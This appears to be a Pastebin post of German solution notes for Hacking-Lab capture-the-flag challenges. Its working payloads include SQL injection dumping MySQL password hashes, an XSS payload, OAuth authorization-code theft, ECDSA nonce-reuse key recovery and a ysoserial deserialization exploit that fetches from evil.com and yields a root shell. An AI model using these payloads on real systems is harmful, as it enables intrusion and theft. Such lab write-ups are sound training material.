Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 5215 wordpressplugger ------------:
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1
- -> Liefert das Ergebnis von Kalender id 1.
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2
- -> Liefert kein Ergebnis
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2-1
- -> Liefert wiederum Ergebnis von id 1.
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1/**/ORDER/**/BY/**/14
- -> Liefert id 1.
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,count(user),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
- -> Zeigt im "Subject"-Feld eine 6. Also existieren 6 Eintraege:
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,group_concat(user,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
- -> root:*09753075E6FEF0002CC255046396E59A1ED19BB1,
- <selber eintrag>
- <selber eintrag>
- <selber eintrag>
- debian-sys-maint:*6ABC3CC789E7C360B292AF4FE1DF816C2C53488D,
- wpuser:*C9B2DB1CA193280B971CA3602D5174A5D637D2BF
- Patch: + $_GET["id"] = intval($_GET["id"]);
- 5212 Hello my name is ------------:
- http://348bc741d2dc.i.hacking-lab.com/card.php?name=Yolo&size=467" onload="eval(document.location.hash.slice(1))">#alert(1337)
- Patch: $size = htmlspecialchars($_GET['size'], ENT_QUOTES);
- 7550 Princess in Distress ------------:
- #!/usr/bin/perl
- open F, '<', 'input.html';
- do {
- local $/;
- $content = <F>;
- };
- close F;
- $content =~ s/\s/|/g;
- $content =~ s/[^|]+/ /g;
- $binary = '';
- for (split / /, $content) {
- $binary .= '0' if $_ eq '|';
- $binary .= '1' if $_ eq '||';
- }
- print pack 'B*', $binary;
- Ausgabe: What is a man? A miserable little pile of secrets: \x89PNG^M...
- $ file output
- output: PNG image data, 320 x 224, 8-bit/color RGB, non-interlaced
- #!/usr/bin/perl
- use GD;
- $img = GD::Image->new('output.png');
- $binary = '';
- for $y (0 .. 6) {
- for $x (0 .. 319) {
- ($r, $g, $b) = $img->rgb($img->getPixel($x, $y));
- $binary .= '0' if $r > 80;
- $binary .= '1' if $r < 80;
- }
- }
- print pack 'B*', $binary;
- Ausgabe:
- This is not the file you're looking for... *jedi gesture*
- If you look carefuly, sometimes a file can hide another..
- By the way, should you stumble upon a locked chest during
- your quest, this key will have it opened, once unciphered
- with the magic number of 1337:
- BQRAIHUJBVWSF
- Gronsfeld Verschluesselung:
- "BQRAIHUJBVWSF" entschluesselt mit Key "1337" ergibt: "ANOTHERCASTLE".
- $ binwalk output
- DECIMAL HEXADECIMAL DESCRIPTION
- --------------------------------------------------------------------------------
- 51 0x33 PNG image, 320 x 224, 8-bit/color RGB, non-interlaced
- 92 0x5C Zlib compressed data, default compression, uncompressed size >= 215264
- 3450 0xD7A PNG image, 256 x 224, 8-bit/color RGB, non-interlaced
- 3491 0xDA3 Zlib compressed data, default compression, uncompressed size >= 172256
- $ 7z e out.zip -y -pANOTHERCASTLE
- $ file mario.xm
- mario.xm: Fasttracker II module sound data Title: "super mario brothers\032FastTracker v2.00 \004\001\024\001"
- $ strings mario.xm
- ...
- IFOUNDTHEPRINCESS
- greenbass:mel-o-d/hbe
- I hope you had fun!
- ------------- Tenchi
- 7554 Binary Tricks ------------:
- $ ltrace ./houdini.bin
- __libc_start_main(0x40078a, 1, 0x7fff42d88e28, 0x400930 <unfinished ...>
- getenv("ADMIN")
- atoi(0x7fff42d89fd6, 0x7fff42d88cf2, 3, 2)
- setenv("ADMIN", "-1", 1)
- printf("What did you expect?")
- ...
- 0x00000000004006fe <+142>: movzbl 0x200713(%rip),%eax # 0x600e18 == 'A'
- 0x0000000000400705 <+149>: mov %al,-0x10(%rbp)
- 0x0000000000400708 <+152>: movzbl 0x200703(%rip),%eax # 0x600e12 == 'D'
- 0x000000000040070f <+159>: mov %al,-0xf(%rbp)
- 0x0000000000400712 <+162>: movzbl 0x2006fb(%rip),%eax # 0x600e14 == 'M'
- 0x0000000000400719 <+169>: mov %al,-0xe(%rbp)
- 0x000000000040071c <+172>: movzbl 0x2006f3(%rip),%eax # 0x600e16 == 'I'
- 0x0000000000400723 <+179>: mov %al,-0xd(%rbp)
- 0x0000000000400726 <+182>: movzbl 0x2006e3(%rip),%eax # 0x600e10 == 'N'
- 0x000000000040072d <+189>: mov %al,-0xc(%rbp)
- 0x0000000000400730 <+192>: movb $0x0,-0xb(%rbp)
- 0x0000000000400734 <+196>: lea -0x10(%rbp),%rax
- 0x0000000000400738 <+200>: mov %rax,%rdi
- 0x000000000040073b <+203>: callq 0x400560 <getenv@plt>
- 0x0000000000400740 <+208>: mov %rax,-0x8(%rbp)
- 0x0000000000400744 <+212>: cmpq $0x0,-0x8(%rbp)
- 0x0000000000400749 <+217>: je 0x400768 <register_tm_clones+248>
- 0x000000000040074b <+219>: mov -0x8(%rbp),%rax
- 0x000000000040074f <+223>: mov %rax,%rdi
- 0x0000000000400752 <+226>: callq 0x4005f0 <atoi@plt>
- 0x0000000000400757 <+231>: cmp $0x7ffffffa,%eax # atoi(getenv("ADMIN")) == 2147483642
- hacker@096e684245c3:/opt/houdini$ ADMIN=2147483642 ./houdini.bin
- The flag is : {simsalabim /usr/bin !}
- 4300 OAuth2 ------------:
- redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
- -> Ok
- redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizex
- -> OAuth Error
- redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizedd
- -> Ok
- redirect_uri=httphttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
- -> Ok
- Zunaechst den ersten Redirect mitschneiden, ihm aber nicht folgen:
- http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
- Der Redirect Parameter wird nun wie folgt modifiziert:
- http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3a%2F%2Fmeine.domain.xxx%2f%3fxxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
- Auf meine.domain.xxx sehen wir nun folgenden Request eintreffen:
- GET /?xxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg HTTP/1.1
- ...
- User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.10.0-327.13.1.el7.x86_64
- code: h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
- http://509876f5a784.i.hacking-lab.com/app1/authorized?next=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
- Signed in as admin
- Gold nugget: k2PCyLoOXw-SWNbqsY4KUQNAtbBQVHqjOXcFGj8G
- 7686 Breaking Elliptic Curve Cryptography ------------:
- #!/usr/bin/perl
- use Crypt::PK::ECC;
- use Data::Dumper;
- my $priv = Crypt::PK::ECC->new('private_key.pem');
- print Dumper($priv->key2hash);
- Ausgabe:
- $VAR1 = {
- 'size' => 24,
- 'curve_bytes' => 24,
- 'curve_name' => 'SECP192R1',
- 'curve_Gx' => '188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012',
- 'curve_B' => '64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1',
- 'curve_order' => 'FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831',
- 'curve_bits' => 192,
- 'k' => 'AC8577FF2504492E7CB6D5F8716D4C193728D8592B6F4225',
- 'curve_prime' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF',
- 'curve_A' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC',
- 'pub_x' => '1D590766F26A888B8C6C38E8A0ABDA1609B40955D1996620',
- 'curve_Gy' => '07192B95FFC8DA78631011ED6B24CDD573F977A11E794811',
- 'curve_cofactor' => 1,
- 'type' => 1,
- 'pub_y' => '8BD11F87E8F87AE0607F58BF68327DF2E5186D7D97F2C3F7'
- };
- Standard NIST192p Kurve. Im Wireshark Dump sieht man die beiden Signaturen:
- sig = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvc1ilypdV4aDLRLIlVaCCkHsuN6EAet0 und sig2 = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvSvNuLoc421+3BZMMFukNTOztlpj9kf4e
- Aufgeteilt in (r, s) ist das
- (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e) und
- (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e)
- #!/usr/bin/python
- from hashlib import sha1
- import base64
- from ecdsa import numbertheory
- m1 = int(sha1("iSsuZJOq1FNKMuK4wm88UEkr21wgsypW").hexdigest(),16)
- m2 = int(sha1("x3wqOnaetBPO66TrBaMyr3NQIDbhvK0w").hexdigest(),16)
- r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
- s1 = int("7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e", 16)
- r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
- s2 = int("4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e", 16)
- n = int("FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831", 16)
- _k = (m1 - m2) * numbertheory.inverse_mod(s1 - s2, n) % n
- _d = (s1 * _k - m1) * numbertheory.inverse_mod(r1, n) % n
- print hex(_d)
- Ausgabe: 0x2f3c25b19905c1c0c5a75507064b94289c0b7064b16e2c31L
- #!/usr/bin/python
- from ecdsa import SigningKey
- from ecdsa import NIST192p
- import base64
- sk = SigningKey.from_pem(open("private_key.pem").read())
- sk_new = sk.from_string("\x2f\x3c\x25\xb1\x99\x05\xc1\xc0\xc5\xa7\x55\x07\x06\x4b\x94\x28\x9c\x0b\x70\x64\xb1\x6e\x2c\x31", curve=NIST192p);
- message = "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4"
- sig = sk_new.sign(message)
- print base64.b64encode(sig)
- Ausgabe:
- YKQBPvMtErS5rHvGKe1jXmETsKwFMWgnif0MxwwEnestC4+77wgS3H2RAbHf6Utd
- Damit fuer die Nonce "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4" eingeloggt erhaelt man das Secret:
- #This class will make everyone our slaves!
- import evillib
- class EvilAlgorithm:
- def bad_function(self):
- evillib.evilyfy()
- print('Obey slaves!')
- evilness = "sooo evil!"
- return evilness
- 5219 Rohde & Schwarz Cybersecurity-Challenge ------------:
- $ file hackme.beam
- hackme.beam: Erlang BEAM file
- $ erl
- Erlang/OTP 17 [erts-6.2] [source] [64-bit] [smp:4:4] [async-threads:10] [kernel-poll:false]
- Eshell V6.2 (abort with ^G)
- 1> io:format("~p~n",[beam_disasm:file("hackme.beam")]).
- {beam_file,hackme,
- [{module_info,0,4},{module_info,1,6},{start,0,2}],
- [{vsn,[284277428168876805194481449229875660789]}],
- [{options,[]},
- {version,"6.0"},
- {time,{2016,2,24,14,33,49}},
- {source,"/tmp/Untitled Folder/hackme.erl"}],
- [{function,start,0,2,
- [{label,1},
- {line,1},
- {func_info,{atom,hackme},{atom,start},0},
- {label,2},
- {allocate,0,0},
- {move,{literal,"'"},{x,1}},
- {move,{literal,"MuMuMuLoxkOtZnkNurk"},{x,0}},
- {line,2},
- {call_ext,2,{extfunc,string,concat,2}},
- {move,{literal,["Dpohsbut nbo! Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: "]},
- {x,1}},
- {move,{literal,"Lets beat erlang files!~n~p"},{x,0}},
- {line,3},
- {call_ext_last,2,{extfunc,io,format,2},0}]},
- {function,module_info,0,4,
- [{line,0},
- {label,3},
- {func_info,{atom,hackme},{atom,module_info},0},
- {label,4},
- {move,{atom,hackme},{x,0}},
- {line,0},
- {call_ext_only,1,{extfunc,erlang,get_module_info,1}}]},
- {function,module_info,1,6,
- [{line,0},
- {label,5},
- {func_info,{atom,hackme},{atom,module_info},1},
- {label,6},
- {move,{x,0},{x,1}},
- {move,{atom,hackme},{x,0}},
- {line,0},
- {call_ext_only,2,
- {extfunc,erlang,get_module_info,2}}]}]}
- ok
- 2>
- Verschluesselt: Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: MuMuMuLoxkOtZnkNurk
- Entschluesselt: You figured out how to beat erlang beam files. Here is the flag: GoGoGoFireInTheHole
- 7685 Why so serious ------------:
- Login:
- URL loginUrl = new URL(AcmeClient.getServerUrl() + "/login");
- String urlParameters = String.format("username=%s&password=%s", new Object[] { username, password });
- byte[] postData = urlParameters.getBytes(StandardCharsets.UTF_8);
- int postDataLength = postData.length;
- HttpURLConnection conn = (HttpURLConnection)loginUrl.openConnection();
- conn.setRequestMethod("POST");
- conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
- conn.setRequestProperty("Content-Length", Integer.toString(postData.length));
- conn.setRequestProperty("charset", "utf-8");
- conn.setUseCaches(false);
- conn.setInstanceFollowRedirects(false);
- conn.setDoOutput(true);
- DataOutputStream wr = new DataOutputStream(conn.getOutputStream());
- wr.write(postData);
- POST /acme-server//login HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- charset: utf-8
- Cache-Control: no-cache
- Pragma: no-cache
- User-Agent: Java/1.8.0_65
- Host: 6f00328f7dc4.i.hacking-lab.com
- Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
- Connection: keep-alive
- Content-Length: 32
- username=johndoe&password=123456
- Response:
- HTTP/1.1 200 OK
- Server: Apache-Coyote/1.1
- Content-Type: text/xml;charset=ISO-8859-1
- Content-Length: 270
- Date: Fri, 01 Jul 2016 13:52:21 GMT
- <?xml version="1.0"?>
- <access-control>
- <right id="11">false</right>
- <right id="134">true</right>
- <right id="13">true</right>
- <right id="291">true</right>
- <right id="1024">false</right>
- <right id="987">false</right>
- <right id="1337">true</right>
- </access-control>
- private void jButton1ActionPerformed(ActionEvent evt)
- {
- RecordBean record = new RecordBean();
- record.setLastName(this.fieldLastName.getText());
- record.setFirstName(this.fieldFirstName.getText());
- record.setGender(this.fieldGender.getModel().getSelectedItem().toString());
- record.setEmail(this.fieldEmail.getText());
- try
- {
- URL url = new URL(AcmeClient.getServerUrl() + "/adddata");
- HttpURLConnection conn = (HttpURLConnection)url.openConnection();
- conn.setDoOutput(true);
- ObjectOutputStream oos = new ObjectOutputStream(conn.getOutputStream());
- oos.writeObject(record);
- oos.flush();
- oos.close();
- conn.getResponseCode();
- }
- catch (Exception e)
- {
- throw new RuntimeException(e);
- }
- }
- }
- POST /acme-server/adddata HTTP/1.1
- ...
- Response:
- ...
- <b>exception</b></p><pre>java.io.StreamCorruptedException: invalid stream header: 75736572
- java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:804)
- java.io.ObjectInputStream.<init>(ObjectInputStream.java:299)
- com.acme.server.AddDataServlet.processRequest(AddDataServlet.java:36)
- com.acme.server.AddDataServlet.doPost(AddDataServlet.java:71)
- javax.servlet.http.HttpServlet.service(HttpServlet.java:648)
- javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
- org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
- $ java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'wget evil.com:8080/file -O /tmp/xxx' > stream.bin
- POST /acme-server/adddata HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- charset: utf-8
- Cache-Control: no-cache
- Pragma: no-cache
- User-Agent: Java/1.8.0_65
- Host: b01ed7e7b10b.i.hacking-lab.com
- Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
- Connection: keep-alive
- Content-Length: 2078
- ’...<Payload aus der Stream.bin>
- $ nc -vlp 8080
- listening on [any] 8080 ...
- Warning: forward host lookup failed for host-246-102.compass-security.com:
- connect to [91.214.168.38] from host-246-102.compass-security.com [212.254.246.102] 42497
- id
- uid=0(root) gid=0(root) groups=0(root)
- ls -la
- total 124
- drwxr-sr-x. 10 root staff 4096 Jul 1 12:50 .
- drwxrwsr-x. 11 root staff 4096 Mar 15 22:15 ..
- -rw-r--r--. 1 root root 57011 Feb 2 19:39 LICENSE
- -rw-r--r--. 1 root root 1444 Feb 2 19:39 NOTICE
- -rw-r--r--. 1 root root 6741 Feb 2 19:39 RELEASE-NOTES
- -rw-r--r--. 1 root root 16195 Feb 2 19:39 RUNNING.txt
- drwxr-xr-x. 2 root root 4096 Mar 15 22:15 bin
- drwxr-xr-x. 3 root root 4096 Jul 1 12:50 conf
- drwxr-sr-x. 2 root staff 4096 Jul 1 12:50 dummy
- drwxr-xr-x. 2 root root 4096 Mar 15 22:15 lib
- drwxr-xr-x. 2 root root 4096 Jul 1 12:50 logs
- drwxr-xr-x. 2 root root 4096 Mar 15 22:15 temp
- drwxr-xr-x. 8 root root 4096 Jul 1 12:50 webapps
- drwxr-xr-x. 3 root root 4096 Jul 1 12:50 work
- cd /tmp
- ls
- goldnugget
- hsperfdata_root
- xxx
- cat goldnugget
- ZAhgt^L&NgTUWDwv577fY*A^G8y!EGUT
- 5076 Listen Carefully ------------:
- LSBs aus jeweils linken und rechtem Frame abwechseln:
- #!/usr/bin/perl
- use Audio::SndFile;
- $f = Audio::SndFile->open("<", "audio_file.wav");
- $ret = $f->read_short($buffer, $f->frames);
- @values = unpack("S*", $buffer);
- for (0 .. ~~@values - 1) {
- $left[$x++] = $values[$_] if $_ % 2 == 0;
- $right[$y++] = $values[$_] if $_ % 2 != 0;
- }
- for (0 .. ~~@left - 1) {
- $str .= $left[$_] & 1 if $_ % 2 == 0;
- $str .= $right[$_] & 1 if $_ % 2 != 0;
- }
- print substr pack('B*', $str), 0, 445;
- $ perl solve.pl
- Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Add Comment
Please, Sign In to add comment